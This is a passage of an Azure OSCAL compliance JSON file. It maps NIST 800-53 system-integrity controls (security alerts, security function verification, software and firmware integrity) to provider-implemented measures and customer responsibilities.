The issue is tracked by Azure Networking to completion."}],"responsibilities":[{"uuid":"46a2ab81-f61e-4b1d-b860-37a0801c2824","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-044"}],"description":"The customer is responsible for disseminating security alerts, advisories, and directives to: customer-defined personnel/roles, organizational elements, and/or external organizations.","provided-uuid":"3051a11b-3f25-4764-95b7-33066dd3c14f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"38f40672-e65a-456e-95b4-d6d0fb075dc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.d","by-components":[{"uuid":"2521666e-9306-42fc-9424-345c28e10358","export":{"provided":[{"uuid":"e302f163-f34a-4252-b0d9-83c6307a24fe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-045"}],"description":"Azure conducts an analysis on the list of security directives provided by the C+AI Security team to confirm applicability to Azure assets. On completion of the analysis, the Azure service teams prepare the Final Monthly Patch List specifying the vulnerabilities that must be patched. 
Security remediations are implemented as follows:\n\n* Remediation for High Risk vulnerabilities is implemented within thirty (30) days of the vulnerability mitigation being released by the vendor.\n* Remediation for Medium Risk vulnerabilities is implemented within ninety (90) days of the vulnerability mitigation being released by the vendor.\n* Low Risk vulnerabilities are risk-reviewed by Azure Security. Many Low Risk scan results are determined by Azure Security to pose no risk to Azure. In this case an exception is filed, and the result is not remediated. If the result is determined to pose any risk to Azure, remediation is implemented within one hundred and eighty (180) days.\n\nAzure Security verifies the degree of compliance using vulnerability scanners deployed in Azure.\n\nServers\n\nOn receipt of the list of updates from MSRC, the RDOS and IPAK teams conduct an analysis to determine the applicability of the patches for the managed OS, with the intent that all patches except those that are specifically not applicable to the code running on their servers are applied. If the RDOS and IPAK teams decide not to apply a patch because it is not applicable to the base images used in the environment, they create a patch exception request ticket in DevOps. This request is then reviewed and approved by the Azure Security team. A justification for not selecting the patches, including the details of the non-applicable patches, is documented in DevOps. A patch is deemed applicable even if the affected software is installed in the environment but not running.\n\nNetwork Devices\n\nFor network devices, hardware vendors make Azure Networking aware of security vulnerabilities on their products via e-mail. Azure Networking logs the email into the ticketing system and performs analysis to evaluate possible risks and mitigations. 
Azure Networking has dedicated support engineers from the major hardware vendors, including, but not limited to, Cisco, Juniper, and F5, that assist with the analysis and determination of the course of action. The issue is tracked by Azure Networking to completion."}],"responsibilities":[{"uuid":"25d56d73-eb93-4e26-bf72-83f7c5aac445","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-045"}],"description":"The customer is responsible for implementing security directives in accordance with established time frames, or notifying the issuing organization of the degree of noncompliance.","provided-uuid":"e302f163-f34a-4252-b0d9-83c6307a24fe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"41e37517-276c-4a72-987a-c1e40633ebb6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-5.1","statements":[{"uuid":"38fb0a12-6997-45b5-abca-f7f032c77fee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5.1_smt","by-components":[{"uuid":"2b2af8e5-fcf7-49a0-90f7-2925061db494","export":{"provided":[{"uuid":"ffa91cb0-169a-415e-a3fc-1aa94ee969e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-046"}],"description":"Microsoft publishes bulletins that include specific information relevant to security updates being released. 
Microsoft security bulletins are available to all personnel and can be found at the link below.\n\n<https://www.microsoft.com/en-us/msrc/technical-security-notifications>\n\nPersonnel can subscribe to this notification service. In addition, Microsoft utilizes automated tools and mechanisms such as Kusto, Jarvis, Service 360 (S360), and Incident Management (IcM) to follow up on alert-related communications for service teams."}],"responsibilities":[{"uuid":"5944aa0c-da01-4015-8e68-be72d9b3d507","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-046"}],"description":"The customer is responsible for using automated mechanisms to make security alert and advisory information available throughout the organization.","provided-uuid":"ffa91cb0-169a-415e-a3fc-1aa94ee969e3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3acb7e3f-3c46-4915-baae-d844239d0845","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-6","statements":[{"uuid":"ef891b3c-4a23-4715-8c79-4d5c41c670c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.a","by-components":[{"uuid":"f827a85c-c17f-4a91-ab16-ac04ef9b2a97","export":{"provided":[{"uuid":"381f4fa0-ace9-45a0-b4b7-1420ef9243c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-047"}],"description":"Servers\n\nAzure performs 
near-real-time auditing and periodic verification of security functions to confirm their operating effectiveness. Azure uses applications called Geneva Monitoring Runners to monitor the collected data and report on the overall health of the system. If the overall health of the system is automatically deemed unacceptable for the environment, the Fabric Controller (FC) is notified, the unhealthy system is shut down, and a new healthy system is brought up. If Azure DevOps or Incident Management (IcM) tickets are created for any security events, including but not limited to alerts, advisories, anomalies, and health status, the Windows Azure LiveSite (WALS) team actively works the issues until resolution. The WALS team is staffed twenty-four (24) hours a day, seven (7) days a week. Azure uses the logging and monitoring pipeline and event audit policies to capture security functions and perform alerting in near-real time. Azure sends automated alerts to the Security Response Team when anomalies are discovered, for triage, investigation, and remediation; it also alerts upon system startup and/or restart and continuously provides event monitoring and alerting to the Security Response Team.\n\nNetwork Devices\n\nAzure uses Config Policy Verifier (CPV) and Config Change Reporter (CCR) to verify correct operation of security functions of network devices on a continuous basis. CPV and CCR automatically send alerts to the network device monitoring tool alarm console regarding deviations from correct operation of security functions. The tools alert upon system startup and/or restart and continuously provide event monitoring and alerting to the Microsoft Operations Center (MOC). The consoles reside with the MOC, which provides analysis and routing to the Azure Networking team for remediation. CPV and CCR back up the configuration of network devices, allowing the Azure Networking team to know who made what changes to the system. 
This captures all changes to the device configuration including any related to security functions and deviations from baselines."}],"responsibilities":[{"uuid":"e74ae79b-d5bd-44af-bc28-29711b3542a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-047"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security and privacy function verification for customer-deployed resources.","provided-uuid":"381f4fa0-ace9-45a0-b4b7-1420ef9243c2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"15459bac-ce27-4352-b483-b3ce44c40f12","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.b","by-components":[{"uuid":"12a16237-629d-472d-a0b5-a3680445a59f","export":{"provided":[{"uuid":"8e63c624-a045-45c0-9020-4cefb70125da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-048"}],"description":"The audit logging and monitoring pipeline alerts upon system startup and/or restart and continuously provides event monitoring and alerting to the Security Response Team and Microsoft Operations Center (MOC)."}],"responsibilities":[{"uuid":"7ee34226-ad8d-4fcc-a777-a4e6370ce5ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-048"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security and privacy function verification for customer-deployed resources at customer-defined system transitional states (e.g., startup, restart, shutdown, abort), upon command 
by a user with appropriate privilege, and/or at a customer-defined frequency.","provided-uuid":"8e63c624-a045-45c0-9020-4cefb70125da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"54da78dd-0716-4adc-9175-ab59c2919bc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.c","by-components":[{"uuid":"20118ecf-e824-4f77-b049-6356fd709949","export":{"provided":[{"uuid":"3bc93c45-c046-4430-bf7b-a50be0d177e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-049"}],"description":"The audit logging and monitoring pipeline alerts upon system startup and/or restart and continuously provides event monitoring and alerting to the Security Response Team and Microsoft Operations Center (MOC)."}],"responsibilities":[{"uuid":"4e571cf5-8e7b-49b5-86b7-86834f9f32d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-049"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security function verification for customer-deployed resources and for notifying customer-defined personnel/roles of failed security and privacy verification tests.","provided-uuid":"3bc93c45-c046-4430-bf7b-a50be0d177e9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e26e977f-4953-4305-8f9c-131d30c22b52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-6_smt.d","by-components":[{"uuid":"633f953f-98cb-41a4-aecd-703e1db1a352","export":{"provided":[{"uuid":"b5104f18-84d4-4bb9-98b9-ae164a01c769","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-050"}],"description":"The monitoring tools identified above generate alerts to service team personnel in the case of security functionality failure. Depending on the type of issue, Azure DevOps or IcM tickets are opened to track resolution of the alert following the incident management process."}],"responsibilities":[{"uuid":"084ff588-a1f5-4240-8520-056dadfc0564","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for security function verification for customer-deployed resources and whether shutdown, restart, and/or an alternative customer-defined action is taken when anomalies are discovered.","provided-uuid":"b5104f18-84d4-4bb9-98b9-ae164a01c769"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bb8819cc-beaf-409d-83fb-1fc9a2100fed","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7","statements":[{"uuid":"106183f4-06fd-49f3-a693-c9c4bdefb8f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7_smt.a","by-components":[{"uuid":"970a407a-8567-491a-9d92-23e42ad14bcb","export":{"provided":[{"uuid":"41e795e5-7a65-4bb2-9e8c-eeae1cc55398","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-051"}],"description":"Servers: Azure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes are reviewed and approved before they are deployed to the Azure production environment. Additionally, builds are digitally signed before they are deployed. If this integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. Azure components have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners automatically generate alerts if any component health discrepancies are identified. This determines whether recently deployed software is propagated to more assets or rolled back, as health indicators dictate. 
Azure also utilizes Qualys and Azure Security Monitoring (ASM) for integrity scanning to reduce the risk of software components and devices being tampered with in the Azure environment. ASM has components that observe, analyze, and report on security events in the Azure environment. It complements the Azure security model by examining constraints that should always remain valid, including configuration settings. The Windows operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files. WRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on-demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool. File Integrity Monitoring (FIM) consists of two elements: system file protection provided by WRP for server baselines, which is built into the operating system; and critical file monitoring provided by a combination of Local Security Policy settings for Windows Audit Object Access together with the appropriate system access control list applied to the files designated as application-critical. 
WRP is a real-time solution that performs scanning on a continuous basis. Azure detects changes made to the environment through the Service Fabric and configuration platform, and custom service Monitoring Agents. Changes are detected in real time and the service provisioning and configuration platform performs predefined steps to compare the integrity of operating software against released production software versions and reimage the Guest OS with appropriate software files or shut down/restart the Guest OS. If the issue is not resolved by these means, then the system is reimaged, or an alert is generated to the service team.\n\nNetwork Devices\n\nAzure uses Config Policy Verifier (CPV) and Config Change Reporter (CCR) to notify the Azure Networking team of unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to the network device monitoring tool alarm console regarding deviations from correct operation of security functions. CPV and CCR send alerts upon system startup and/or restart and continuously provide event monitoring and alerting to the Microsoft Operations Center (MOC). The network device monitoring tool consoles reside with the MOC, which provides analysis and routing to the Azure Networking team for remediation. CPV and CCR back up the configuration of network devices, allowing the Azure Networking team to know who made what changes to the system. This captures all changes to the device configuration, including who made what changes when. CPV and CCR are real-time solutions that perform scanning on a continuous basis.\n\nAzure Services\n\nIn addition to the Azure standard tooling and processes, service teams may use SCOM to monitor Windows operating systems. 
SCOM provides file integrity validation and protection, as well as the recovery of core system files if any unauthorized changes are detected."}],"responsibilities":[{"uuid":"d4d1dd2f-93a2-4c77-8186-e8a2b4647c88","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting software and information integrity for customer-deployed resources.","provided-uuid":"41e795e5-7a65-4bb2-9e8c-eeae1cc55398"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3259d895-fe97-4c22-b826-91785647ae54","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7_smt.b","by-components":[{"uuid":"cd029fd2-19c6-44d1-a10b-227424813d4f","export":{"provided":[{"uuid":"aae58f11-dc52-44db-963d-1f0e6dfe5448","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-052"}],"description":"Servers: Azure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes are reviewed and approved before they are deployed to the Azure production environment. Additionally, builds are digitally signed before they are deployed. If this integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. 
Azure components have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners automatically generate alerts if any component health discrepancies are identified. This determines whether recently deployed software is propagated to more assets or rolled back, as health indicators dictate. Azure also utilizes Qualys and Azure Security Monitoring (ASM) for integrity scanning to reduce the risk of software components and devices being tampered with in the Azure environment. ASM has components that observe, analyze, and report on security events in the Azure environment. It complements the Azure security model by examining constraints that should always remain valid, including configuration settings. The Windows operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files. WRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on-demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool. 
File Integrity Monitoring (FIM) consists of two elements: system file protection provided by WRP for server baselines, which is built into the operating system; and critical file monitoring provided by a combination of Local Security Policy settings for Windows Audit Object Access together with the appropriate system access control list applied to the files designated as application-critical. WRP is a real-time solution that performs scanning on a continuous basis. Azure detects changes made to the environment through the Service Fabric and configuration platform, and custom service Monitoring Agents. Changes are detected in real time and the service provisioning and configuration platform performs predefined steps to compare the integrity of operating software against released production software versions and reimage the Guest OS with appropriate software files or shut down/restart the Guest OS. If the issue is not resolved by these means, then the system is reimaged, or an alert is generated to the service team.\n\nNetwork Devices\n\nAzure uses Config Policy Verifier (CPV) and Config Change Reporter (CCR) to notify the Azure Networking team of unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to the network device monitoring tool alarm console regarding deviations from correct operation of security functions. CPV and CCR send alerts upon system startup and/or restart and continuously provide event monitoring and alerting to the Microsoft Operations Center (MOC). The network device monitoring tool consoles reside with the MOC, which provides analysis and routing to the Azure Networking team for remediation. CPV and CCR back up the configuration of network devices, allowing the Azure Networking team to know who made what changes to the system. This captures all changes to the device configuration, including who made what changes when. CPV and CCR are real-time solutions that perform scanning on a continuous basis. 
\n\nAzure Services\n\nIn addition to the Azure standard tooling and processes, service teams may use SCOM to monitor Windows operating systems. SCOM provides file integrity validation and protection, as well as the recovery of core system files if any unauthorized changes are detected."}],"responsibilities":[{"uuid":"a156f431-5552-475d-b05d-be5779673cb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-052"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for taking action when unauthorized changes to the customer-deployed resources are detected.","provided-uuid":"aae58f11-dc52-44db-963d-1f0e6dfe5448"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6d6f161a-c2cb-40e9-a0b4-248144ba8592","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.1","statements":[{"uuid":"e018c5c3-7497-4299-8e1a-e9ded18962be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.1_smt","by-components":[{"uuid":"223c8be8-5279-4d34-b5c3-5a9f94e90615","export":{"provided":[{"uuid":"77822685-0aba-4fd0-9b01-c12add29c2be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-053"}],"description":"Azure software updates are reviewed for any unauthorized changes before entering the production environment as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. 
Azure components have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified.\n\nAzure also utilizes Azure Security Monitoring (ASM) for integrity scanning to reduce the risk of software components and devices being tampered with in the Azure environment. ASM has components that observe, analyze, and report on security events continually in the Azure environment. It complements the Azure security model by examining constraints that should always remain valid, including configuration settings.\n\nAzure reassesses the integrity of software and information by monitoring events reported via Windows Resource Protection (WRP) and File Integrity Monitoring (FIM). Network devices are monitored via Config Policy Verifier (CPV) and Config Change Reporter (CCR) in near-real time. 
WRP, FIM, CPV, and CCR continuously scan the environment in near-real time for changes that would affect the integrity of software in the system."}],"responsibilities":[{"uuid":"f39133ec-5ff3-4bca-99c4-05c898455845","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-053"}],"description":"The customer is responsible for protecting software and information integrity for customer-deployed resources, including performing integrity checks of customer-defined software and information at customer-defined system transitional states (e.g., startup, restart, shutdown, abort), in response to customer-defined security-related events or at a customer-defined frequency.","provided-uuid":"77822685-0aba-4fd0-9b01-c12add29c2be"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fa3dd8d7-e858-411f-8a64-f63cf31f4412","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.2","statements":[{"uuid":"f3fab400-e939-40de-a30f-06e5a15a9bb9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.2_smt","by-components":[{"uuid":"119452fe-a45f-45d1-b6ff-099c7b5d0f6c","export":{"provided":[{"uuid":"3a08e7bc-af1d-43af-a255-908d02caf7fe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-054"}],"description":"Azure software updates are thoroughly reviewed for any unauthorized changes before 
entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes must be reviewed and approved before they are deployed to the environment. Additionally, builds are digitally signed before they are deployed. If the integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. The deployment engine is configured to notify service teams upon discovery of discrepancies during integrity verification. Service teams are notified via email or the creation of DevOps tickets.\n\nThe Windows Server operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files.\n\nWRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on-demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool.\n\nThe Security File Integrity Monitoring (FIM) component consists of two elements:\n\n* System file protection provided by Windows Resource Protection (WRP) for Server baseline(s). 
This functionality is built into the operating system.\n* Critical file monitoring over and above that offered by WRP is provided by a combination of Local Security Policy settings for Windows Audit Object Access (WOA) together with the appropriate system access-control list (SACL) applied to the files designated as application-critical.\n\nBoth technologies write events to the event logs, which are forwarded by an event forwarding tool and monitored by a security information and event management (SIEM) tool. WRP is a real-time solution that performs scanning on a continuous basis.\n\nNetwork Devices\n\nAzure uses the Config Policy Verifier (CPV) and Config Change Reporter (CCR) tools to notify the Azure Networking team of unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to Incident Management (IcM) regarding deviations from correct operation of security functions. CPV and CCR alert upon system startup and restart and continuously provide event monitoring and alerting to Azure Networking. 
CPV and CCR are near-real-time solutions that perform scanning on a continuous basis."}],"responsibilities":[{"uuid":"01d2c304-a7eb-4176-ad3a-2ccc30a0af9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-054"}],"description":"The customer is responsible for protecting software and information integrity for customer-deployed resources by employing automated tools that provide notification to customer-defined personnel/roles upon discovering discrepancies during integrity verification.","provided-uuid":"3a08e7bc-af1d-43af-a255-908d02caf7fe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"59e74b93-fa99-4e1a-91fb-1edc8e1d1fa2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.5","statements":[{"uuid":"bf982818-f9ef-40d7-8b7e-6532e161e932","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.5_smt","by-components":[{"uuid":"915ace6b-bebb-42f3-8635-b05f4f6b3776","export":{"provided":[{"uuid":"ae8e9fcf-2f7d-4742-b5aa-1be087a4c045","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-055"}],"description":"Azure provides alerts for integrity violations to the Security Response Team to use in case of suspected incidents. 
Shutting down the system in response to an integrity violation could cause operational issues, including outages, and expose the system to availability or denial-of-service risks. The Security Response Team investigates any instance of integrity violation that is suspected of being a security incident and responds according to its operating procedures.\n\nAzure software updates are thoroughly reviewed for any unauthorized changes before entering the production environments as part of the Security Development Lifecycle (SDL) and Change and Release Management processes. Any code changes must be reviewed and approved before they are deployed to the environment. Additionally, builds are digitally signed before they are deployed. If the integrity verification fails at deployment, the deployment operation fails, and the process needs to be started over. The deployment engine is configured to notify service engineer personnel upon discovery of discrepancies during integrity verification. Service engineer personnel are notified via email or the creation of DevOps tickets.\n\nServers\n\nThe Windows Server operating systems provide real-time file integrity validation, protection, and recovery of core system files that are installed as part of Windows or authorized Windows system updates. Windows Resource Protection (WRP) automatically detects and restores the original version of protected files if a program uses an unauthorized method to change those files.\n\nWRP provides protection for system files using two mechanisms. The first mechanism runs in the background. This protection is triggered after WRP receives a directory change notification for a file in a protected directory. After WRP receives this notification, WRP determines which file was changed. If the file is protected, WRP looks up the file signature in a catalog file to determine if the new file is the correct version. 
If the file is not the correct version, WRP replaces the new file with the file from the system protected cache folder (if it is in the cache folder) or from the installation source. In addition to WRP, on-demand validation and recovery of core Windows system files are provided using the System File Checker (sfc.exe) tool.\n\nNetwork Devices\n\nAzure uses the Config Policy Verifier (CPV) and Config Change Reporter (CCR) tools to notify the Azure Networking team of unauthorized changes to network devices on a continuous basis. CPV and CCR automatically send alerts to Incident Management (IcM) regarding deviations from correct operation of security functions. CPV and CCR alert upon system startup and restart and continuously provide event monitoring and alerting to Azure Networking. CPV and CCR are near-real-time solutions that perform scanning on a continuous basis."}],"responsibilities":[{"uuid":"9b47eb2b-1f4a-46f3-9fca-cb275f7076ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-055"}],"description":"The customer is responsible for automatically shutting down or restarting customer-deployed resources, and/or implementing customer-defined security safeguards, when integrity violations are discovered.","provided-uuid":"ae8e9fcf-2f7d-4742-b5aa-1be087a4c045"}]},"description":"See inheritance and customer responsibility 
